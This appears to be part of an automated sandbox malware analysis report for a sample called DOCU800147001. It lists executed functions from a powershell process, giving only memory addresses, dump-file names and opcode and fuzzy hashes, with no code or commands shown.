                                                • lstrlenA.KERNEL32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                • Instruction ID: 10a66d07964700c4564cfa3c9d38ab292ebab1a3a98e0b2fc59037c9a3325cbe
                                                • Opcode Fuzzy Hash: 69516db92ab03ac2bd29524685631cd9f8e4e2de886f88dc1d7fd11a4109c375
                                                • Instruction Fuzzy Hash: B1F0C235605558FFD7129BA5DD4099EBBA8EF06350F2100AAF800F7211D274EE01ABA9

                                                Executed Functions

                                                Function 074C6628 Relevance: .8, Instructions: 831COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c00afdd8b6700cd22eced8c25d296868b398212072135c9f31ab07ef75f7ece5
                                                • Instruction ID: cdd3be3489cdaab64b1e6a0dbc2f0670dae09a53c02c53696a1b4055a817413c
                                                • Opcode Fuzzy Hash: c00afdd8b6700cd22eced8c25d296868b398212072135c9f31ab07ef75f7ece5
                                                • Instruction Fuzzy Hash: 68727EB8B00255DFDB54CB58C850FAABBB2ABC4304F15C09AD5099B755CB72EC86CF92
                                                Function 074C7210 Relevance: .6, Instructions: 647COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f70595b34c2e8f004b2caaec5e1a8be6fc7df4e3dca0f779194f1c2f966f7fe0
                                                • Instruction ID: 3cf2edbaf378e0fbfba9336f64fd7ed4ce9f2f4334fd79acb98b51324d145dcc
                                                • Opcode Fuzzy Hash: f70595b34c2e8f004b2caaec5e1a8be6fc7df4e3dca0f779194f1c2f966f7fe0
                                                • Instruction Fuzzy Hash: 2C5240B8B00215DFDB54CB18C840FAAB7B2ABC4704F14C099EA499B755CB72ED86CF91
                                                Function 074CCB39 Relevance: .6, Instructions: 620COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f220b551c8f20b7b9d10f858094d396c68bda50f7cc6b38b65fcf76febc7536
                                                • Instruction ID: 3a1bea420b77257f64eabcf07c73b2bccf7d0b7a55bbda1cfb7c53dee4ae364b
                                                • Opcode Fuzzy Hash: 9f220b551c8f20b7b9d10f858094d396c68bda50f7cc6b38b65fcf76febc7536
                                                • Instruction Fuzzy Hash: 6F425EB8B00214DFDB54DB58C850FEBB7B2AB85740F148199EA099F751CB72ED828F91
                                                Function 074C75AC Relevance: .6, Instructions: 572COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70a3a317354145d2a6899625f1d0befcb7e63400409eba50acf7a1eb13b41490
                                                • Instruction ID: 7faab8ce9cfb3597a28157569a195d276d28100d949f0ab47135967227509d9e
                                                • Opcode Fuzzy Hash: 70a3a317354145d2a6899625f1d0befcb7e63400409eba50acf7a1eb13b41490
                                                • Instruction Fuzzy Hash: 473247B8B00205DFDB45CB58C484BAEBBB2EF85714F25815AE905AB755CB72EC42CF81
                                                Function 074C75C0 Relevance: .6, Instructions: 566COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05436f713216a25f4051b19a7c474a6549a4e93cfbe998e25dccef88e69e2a7d
                                                • Instruction ID: f388f573ca3aeacf310c66635e18703ddaba5258485d81a335200b228d7965c2
                                                • Opcode Fuzzy Hash: 05436f713216a25f4051b19a7c474a6549a4e93cfbe998e25dccef88e69e2a7d
                                                • Instruction Fuzzy Hash: 883246B8B00205DFDB45CB58C484BAEBBB2EF85714F15815AE905AB755CB72EC42CF81
                                                Function 074C45D8 Relevance: .6, Instructions: 557COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 612660f7ba2ea0dc35cd62034e56fd81611bad5fe233980741dac5f9755bbdc5
                                                • Instruction ID: 477a3753234d7df0c11f0f2155578f3e2c82354889c3ae316a7505c14732b3d4
                                                • Opcode Fuzzy Hash: 612660f7ba2ea0dc35cd62034e56fd81611bad5fe233980741dac5f9755bbdc5
                                                • Instruction Fuzzy Hash: 6032BCB8B00245DFDB54CB98C550BAEBBB2EF89714F14C059E904AF755CB72EC428B91
                                                Function 074C45BC Relevance: .5, Instructions: 515COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 884057d2c788a9ace554c13261a3332066be41fa57b7633c5af5858577ab1b8b
                                                • Instruction ID: 22e53e43649ea039aad5e160d417381167f6a9f517aab4bba128774652267d6e
                                                • Opcode Fuzzy Hash: 884057d2c788a9ace554c13261a3332066be41fa57b7633c5af5858577ab1b8b
                                                • Instruction Fuzzy Hash: 0B229DB8B00241DFDB54CB98C650FAEBBB2EF85714F15C05AE904AB755CB72EC428B91
                                                Function 074CC368 Relevance: .5, Instructions: 491COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7911c3b11ff3407f1c283f66760138040d4f2f3118bb7e870c7e5e7372190a3a
                                                • Instruction ID: 17186744d229aff16291d4857701c49a020594ba27fe78f9b3a310842c8698d7
                                                • Opcode Fuzzy Hash: 7911c3b11ff3407f1c283f66760138040d4f2f3118bb7e870c7e5e7372190a3a
                                                • Instruction Fuzzy Hash: A0226FB4B00314DFDB14DB68C854FABB7A2AF85740F148199EA099F751CB72ED828F91
                                                Function 074CCC22 Relevance: .5, Instructions: 466COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f19501d66b9cc71867bc2528ae2d9685755a45bfa4d7582bfbd83a9d494857ac
                                                • Instruction ID: 69dbd54c5f655f98d801d89b82ae9e9886b3e1b1543e46b0a1a91abf7766355b
                                                • Opcode Fuzzy Hash: f19501d66b9cc71867bc2528ae2d9685755a45bfa4d7582bfbd83a9d494857ac
                                                • Instruction Fuzzy Hash: E6126EB8700314DFDB14DB68C854FABB7A2EB85740F148199EA099F751CB72ED828F91
                                                Function 09222268 Relevance: .4, Instructions: 438COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8622a0e2d4e45a1cd92d0af2003e7e6b819cab3e327492028580d2ac6567ad8
                                                • Instruction ID: 7158d0c3f55640f27a3c2b13d627f6b0a3496fa31bf5abd98b2e193ef3094919
                                                • Opcode Fuzzy Hash: a8622a0e2d4e45a1cd92d0af2003e7e6b819cab3e327492028580d2ac6567ad8
                                                • Instruction Fuzzy Hash: 43022D75A10219EFCB09CF98D984A9EBBF2FF88310F248159E915AB365C771ED41CB90
                                                Function 092218A0 Relevance: .4, Instructions: 413COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cef8df9caaa9101b060ff0476e3900315d5a94faa0676bc1c796281ce28da507
                                                • Instruction ID: 223ebc12eda8ee249fa896c1897fb02c36d05728632c11ad272efcf016b21bc8
                                                • Opcode Fuzzy Hash: cef8df9caaa9101b060ff0476e3900315d5a94faa0676bc1c796281ce28da507
                                                • Instruction Fuzzy Hash: 69023C34A15259EFDB05CF98C984E9DBBB2FF88310F248159E904AB366C771ED91CB90
                                                Function 074C83E8 Relevance: .4, Instructions: 373COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff852e40d21b54b0f4e2a457a5103a6f7e72b81a293f8503a6446237192611e3
                                                • Instruction ID: a4c26ca2c39cb4a29126bd63ecdee0c2cbf77c3ffaeec40cec4abd61a994a4fc
                                                • Opcode Fuzzy Hash: ff852e40d21b54b0f4e2a457a5103a6f7e72b81a293f8503a6446237192611e3
                                                • Instruction Fuzzy Hash: 43E1AFB8B00205DFDB54DBA8C444BAEBBA6AFC4704F14C45AEA11AF745CB71EC46CB91
                                                Function 074CD072 Relevance: .3, Instructions: 333COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc84244156613d4d5ce06b5e0a823ee224ace17102c09484d3e6f9118209d996
                                                • Instruction ID: 9b9c011939d54fd427cb165b440a549f5dd1c451101c930dd5ef9c0980fad9a1
                                                • Opcode Fuzzy Hash: dc84244156613d4d5ce06b5e0a823ee224ace17102c09484d3e6f9118209d996
                                                • Instruction Fuzzy Hash: 88E140B8F00219DFDB64CB68C844BEAB7B2AF85304F1081A9D509AB755CB71AD86CF51
                                                Function 074C83C9 Relevance: .3, Instructions: 307COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 666398bdc3b134a2c111f0d7bbd924e8b353b32cd8adb21f31503acf0eae9cf1
                                                • Instruction ID: a19b46d5f08ad9d8e7aaad3f3f653ec1b283ea5193d3973f2474b67c8ff6c11a
                                                • Opcode Fuzzy Hash: 666398bdc3b134a2c111f0d7bbd924e8b353b32cd8adb21f31503acf0eae9cf1
                                                • Instruction Fuzzy Hash: D6C19CB8A00205DFDB54CF58C540BEABBB6AF88704F15C45EE901AF755CB72E886CB91
                                                Function 074C8128 Relevance: .2, Instructions: 192COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03fe77ae5ec9ac45a27c80640bc4fcf45bc1da4c5e23d3d5072228da3e130a8c
                                                • Instruction ID: 91ac756f3047a133bf5c193406c4f3d42863e6577f10b8568794b39067e53a0f
                                                • Opcode Fuzzy Hash: 03fe77ae5ec9ac45a27c80640bc4fcf45bc1da4c5e23d3d5072228da3e130a8c
                                                • Instruction Fuzzy Hash: ED71A0B8A00205DFDB54CF98C484AAEBBB6AFC9314F14816ED911AB755CB71EC42CB91
                                                Function 092207C8 Relevance: .2, Instructions: 186COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c147d64ade4e67474eb8cfc54d0a55827bdbdcc15d1626c80fa961cda9119e95
                                                • Instruction ID: 343081c0e0e0856829aa7d703d698ae0ca15f4301fb90f7a10913193b7c32df3
                                                • Opcode Fuzzy Hash: c147d64ade4e67474eb8cfc54d0a55827bdbdcc15d1626c80fa961cda9119e95
                                                • Instruction Fuzzy Hash: A661A130B00259DFDB05DBA9D840AAEBBF6FFC8310F1485A9D505AB365DB359C06CB91
                                                Function 074C8100 Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7329d8ccbe2817968ee9a4a4a8f9abc6253e6f58d28a4d23e37a8648805c2dc7
                                                • Instruction ID: 7ddcc696809f47aae7f56c455a1cf8901565361bb65201fc13b2a147c2a265f5
                                                • Opcode Fuzzy Hash: 7329d8ccbe2817968ee9a4a4a8f9abc6253e6f58d28a4d23e37a8648805c2dc7
                                                • Instruction Fuzzy Hash: D761B2B8A00641DFDB51CF58C485AEEBBB6EF86314F19C15ED450AB722C732E842CB91
                                                Function 074C8127 Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29cac3fbfa22ee2e54c00de73c0d36b266c5ec8548d10dae5e355152ebe0d9e6
                                                • Instruction ID: b84c5dea2a4382cc9bd006085afdc3c34778bc99f8face3e8b1986a37b028724
                                                • Opcode Fuzzy Hash: 29cac3fbfa22ee2e54c00de73c0d36b266c5ec8548d10dae5e355152ebe0d9e6
                                                • Instruction Fuzzy Hash: 6A515EB8A00205DFDB54CF58C484AEABBB6FF89314F14815ED815AB715C732E842CF91
                                                Function 074C80EC Relevance: .2, Instructions: 155COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2f819c4f269a5e46171a3e9fe205dff03b4b6ef1962a1758dadd19a9cd2ac37
                                                • Instruction ID: 3d9ee0b092e766ee167740f4bcae619fc187995c2acc7fc16a69e1293b925be1
                                                • Opcode Fuzzy Hash: d2f819c4f269a5e46171a3e9fe205dff03b4b6ef1962a1758dadd19a9cd2ac37
                                                • Instruction Fuzzy Hash: 30514FB8A00205DFDB54CF98C584AEABBB6FF89314F14855ED815AB715C732E842CF91
                                                Function 074C7E72 Relevance: .1, Instructions: 137COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2979f78c847c1be8b52733cf168b624a9771adc1df17e1d329b437aae8e0ffb
                                                • Instruction ID: 2bd0f4f29451ba03caecdc7f67880f225fc987addef25623fb18147f522cd583
                                                • Opcode Fuzzy Hash: e2979f78c847c1be8b52733cf168b624a9771adc1df17e1d329b437aae8e0ffb
                                                • Instruction Fuzzy Hash: EC51ABB8A00305DFDB64CF94C484BEEBBB6AF84314F15846AE604AB751CB72E842CF41
                                                Function 09221872 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6df06bf76e942b4b92cb9f0e1ee3e3d592348db5ea0a39dbcf96c3120ac14f5f
                                                • Instruction ID: 308b3babb38ae8a59721902052a544566c2e2637c9f28452a70ff7040105b1dd
                                                • Opcode Fuzzy Hash: 6df06bf76e942b4b92cb9f0e1ee3e3d592348db5ea0a39dbcf96c3120ac14f5f
                                                • Instruction Fuzzy Hash: F4519C74A092199FCB05CF9CC9809AEBBF2FF49310B258259E854E7366C331AC51CBA0
                                                Function 074C2125 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db1f41ccc52fb8098954b923406b6fb91b6cc1c789188d02123632265da502b3
                                                • Instruction ID: 5a83e1b50821a2d6fdf88679c04b1d5157e2f53726c123b3dce37474f565c6e1
                                                • Opcode Fuzzy Hash: db1f41ccc52fb8098954b923406b6fb91b6cc1c789188d02123632265da502b3
                                                • Instruction Fuzzy Hash: 5C4138B9B002519BDB51D7B89810BEFBB62AFC5624B1045AFD6018B741DEF1CD4387A2
                                                Function 092232A0 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa8557188ae18f420f6a71cae69c287300508b385c4a9b7523259efeee335e00
                                                • Instruction ID: 3ff85c69ed7db0ffa17a0af3084ea24daf1d1eecda0b448a96b4211b8633874d
                                                • Opcode Fuzzy Hash: fa8557188ae18f420f6a71cae69c287300508b385c4a9b7523259efeee335e00
                                                • Instruction Fuzzy Hash: D9514030A1061ADFCB15CF5CC9949AEF7B6FF88310B248658E955A73A4D735EC42CB90
                                                Function 074C3E00 Relevance: .1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff7696240464732b77e64e4e3c9b581679ae74b651de9bebb7b28839a1e75bcd
                                                • Instruction ID: 1f84630c11538a0ae15f2e761f8148e36865be51ef1540f3b474350cfa5601ed
                                                • Opcode Fuzzy Hash: ff7696240464732b77e64e4e3c9b581679ae74b651de9bebb7b28839a1e75bcd
                                                • Instruction Fuzzy Hash: 2F4137BAB002169BCB94DE69C8002FBF7A9AFC4610B14C96FC905D7345DB31D941C7A3
                                                Function 09223290 Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1746e9a997240f8c185d1c623a5414281e45e29066f2f30e34a12af0d34db48
                                                • Instruction ID: d373873189f155d39ee82914d229f3e4d23f02d988652c141e61ccefe5d65772
                                                • Opcode Fuzzy Hash: d1746e9a997240f8c185d1c623a5414281e45e29066f2f30e34a12af0d34db48
                                                • Instruction Fuzzy Hash: 56512E34A10619DFCB15CF98C9949AEBBB2FF88310B248258E955A73A4D735EC51CB90
                                                Function 09222257 Relevance: .1, Instructions: 115COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0d3f0c2ef08f4ac93a650d478c8a0700fd9fcd0f245ee00d9c062c549827a1d
                                                • Instruction ID: 2399f55180cd36b3ece53ead25215a39b82e8a308a39fd24a84e4fcd6879707d
                                                • Opcode Fuzzy Hash: b0d3f0c2ef08f4ac93a650d478c8a0700fd9fcd0f245ee00d9c062c549827a1d
                                                • Instruction Fuzzy Hash: 48411B74A10259DFCB09CF9CC9949AEBBB1FF48320B248258E915E73A4D736AC51CB90
                                                Function 074C8888 Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6382dc47b9c7da600526a6a4d31ca966396fafa2f71a0c3a36f64d90b039da78
                                                • Instruction ID: 3d04ada934cdf9b8859649bca6a082348acaa9d8c8ae51c276a0ace140cabf2e
                                                • Opcode Fuzzy Hash: 6382dc47b9c7da600526a6a4d31ca966396fafa2f71a0c3a36f64d90b039da78
                                                • Instruction Fuzzy Hash: 2731A4B4B00210EBD7149BA4C854FAF7AA39FC5750F108059EA01AF781CF76AC478BD2
                                                Function 074C8B1C Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54ce18072128af4d78da350e52134aad2b766ff100230c3da0bec52ae897ea2b
                                                • Instruction ID: 5cdabc9865bfa51ae680611f9a5840fecb7487a94123363684c2c7ba4db58580
                                                • Opcode Fuzzy Hash: 54ce18072128af4d78da350e52134aad2b766ff100230c3da0bec52ae897ea2b
                                                • Instruction Fuzzy Hash: 4A3107FA7043439BCB55CA6484113FABB668BC1210F04847FE601CB785EB35E846C752
                                                Function 09220B80 Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83adb77d9bcb172a55b5f036c82384628e3735f7d1319a89e5d1e6a1ac1e0493
                                                • Instruction ID: f04e487e9dd59024d3f99d71381d92e11e59cf6a123a22f9e72d520e9b409082
                                                • Opcode Fuzzy Hash: 83adb77d9bcb172a55b5f036c82384628e3735f7d1319a89e5d1e6a1ac1e0493
                                                • Instruction Fuzzy Hash: 37311874A00209DFCB15CF59C594AAEFBB1FF49310B258299D519EB751C735EC81CB90
                                                Function 074C3DE0 Relevance: .1, Instructions: 82COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2544011605.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_74c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7cc85326f4bd7607d63d09010ebc19504d007423633a7226036e4a4d046874c
                                                • Instruction ID: 3991e4dd884a8e02f2abf88e72fa1fcf1dda72e8d1d61ec7368de321dedb7f9c
                                                • Opcode Fuzzy Hash: b7cc85326f4bd7607d63d09010ebc19504d007423633a7226036e4a4d046874c
                                                • Instruction Fuzzy Hash: 7C2135FED002969BCFA1CF65C5402EABBB4EF49210B29C4AFD81893345E3309945CB97
                                                Function 02BFF520 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2527060477.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2bfd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34d8688741cc7e9456e3d56044b27941c720d98364382017547cd3fda19e2a93
                                                • Instruction ID: 4b34a7f67a570973dce29f102ff9906a4f182c69b6de883e4cd84f3df3f2ff3b
